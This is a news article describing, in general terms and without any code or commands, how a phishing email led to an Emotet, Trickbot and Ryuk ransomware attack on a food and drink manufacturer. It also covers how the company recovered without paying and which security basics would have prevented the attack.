Ransomware: How clicking on one email left a whole business in big trouble

A food and drink manufacturer fell victim to a ransomware attack and crucially didn't give into the extortion demand - but it could've been much worse.
Written by Danny Palmer, Senior Writer

Security experts have given an insight into how a targeted ransomware attack took down the network of a food and drink manufacturer after hackers took advantage of common security vulnerabilities.

The crooks used a phishing attack and took advantage of a number of vulnerabilities – from old hardware to default passwords – to first deploy Emotet and Trickbot malware before delivering the Ryuk ransomware and attempting to extort a fee from the victim to restore the network.

In this case, the organisation didn't opt to pay the ransom – something that authorities discourage and would only fund additional attacks by cyber criminals – but instead had security experts come in to examine the network and restore functionality within 48 hours.

"This was a targeted attack. This is targeting organisations such as this one which, if they don't have the security retainer or IT staff, the initial reaction would be to give into the ransomware attack because they want to return their operations quickly," Bindu Sundaresan, director at AT&T cybersecurity, told ZDNet.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)    

AT&T investigated the attack and helped the unnamed manufacturer get back online without giving into a ransom demand while also experiencing the least amount of disruption to production as possible. But the company likely would not have fallen victim if basic security vulnerabilities hadn't allowed the initial stages of the attack to happen.

Ryuk, like some other forms of ransomware, is deployed as the final stage in a three-pronged attack that also delivers Emotet and Trickbot. Emotet started life as a banking trojan before evolving into a botnet that is leased out to deliver other malware, which in this case is the Trickbot trojan.

Trickbot is a powerful form of malware that provides attackers with a full backdoor into compromised systems, including the ability to move around networks, issue commands and steal additional data.

After this the Ryuk ransomware is downloaded onto the network by the hackers because cyber criminals view it as the quickest and easiest way to make money from a compromised network.

While many ransomware campaigns now start with targeting remote ports, this one began with a phishing attack.

"A user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document, then malicious code executed a PowerShell command that downloaded an Emotet payload," Sundaresan explained.

PowerShell commands generally aren't required by users who don't need administrator rights, so if PowerShell had been disabled for those who don't need it, the cyberattack could've been cut off at this point.

After Emotet formed the initial part of the attack, gaining a foothold in the network the next step was to use the Trickbot malware to steal login credentials for corporate accounts and cloud services to gain access to other parts of the network.

By exploiting this cycle, cyber criminals were able to gain control of over half the network, before eventually delivering the Ryuk ransomware.

"Malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it's costing to their network, the valuable data that's being held – so they have a sense of urgency," said Sundaresan.

However, the attack could have been much worse, given Ryuk had not compromised the entire network but about 60% of it, including ordering and billing applications. This was in part because security personnel were about to contain the attack after being called in by the manufacturer.

"The ability to contain it and the response time was crucial. The ability to contain the incident is the key to recover from it and having the business up and running before it got to the crucial databases," Sundaresan explained.

Within 48 hours, much of the business was back up and running again – crucially without having given into paying a ransom demand to criminals. However, two days of downtime would have been costly to the organisation and restoring the network isn't likely to have been cheap either – plus there's the prospect of having to upgrade security in the aftermath, so attackers don't strike again.

And like many organisations that fall victim to cyberattacks, this one could've prevented itself from falling victim to ransomware by ensuring that cybersecurity hygiene was well managed – but there were simple-to-fix vulnerabilities that attackers were able to take advantage of.

SEE: Ransomware: 11 steps you should take to protect against disaster

For example, the vulnerabilities that Emotet, Trickbot and Ryuk take advantage of have been known about for a long time and critical security updates have been issued to protect users – but despite these updates being years old, there are organisations that still haven't applied them.

"Microsoft has put out patches but patch management and security hygiene still remain issues for organisations," said Sundaresan, who added that this ransomware attack could've also been prevented if strong passwords and multi-factor authentication had been used to secure systems.

"A lot of this can be prevented. If they didn't have default password and end-of-life machines, a lot of this would've been prevented."

And when it comes to cyberattacks, prevention is the best cure, because not only does it stop your organisation from falling victim to ransomware or other malware, the cost of securing the network in advance is almost certainly going to be less expensive than having to do it in the aftermath of an incident – especially if the attack disrupts operations or causes reputational damage that could keep customers away.

So while it might potentially seem expensive, it could be very much worth having security experts from outside the organisation come in to examine the network before damage can be done – and not after.

"Get a security assessment done from an offensive attacker point of view, you don't want to be just doing the security initiatives from compliance or internal testing – it's not enough. You have to get your network tested using multiple attack vectors and you have to do it objectively with full penetration testing," Sundaresan said.

Because ultimately, ransomware – be it Ryuk or another family – is still out there and still remains a threat because too many organisations aren't following the security basics. And until this is fixed, ransomware will remain a problem.


Editorial standards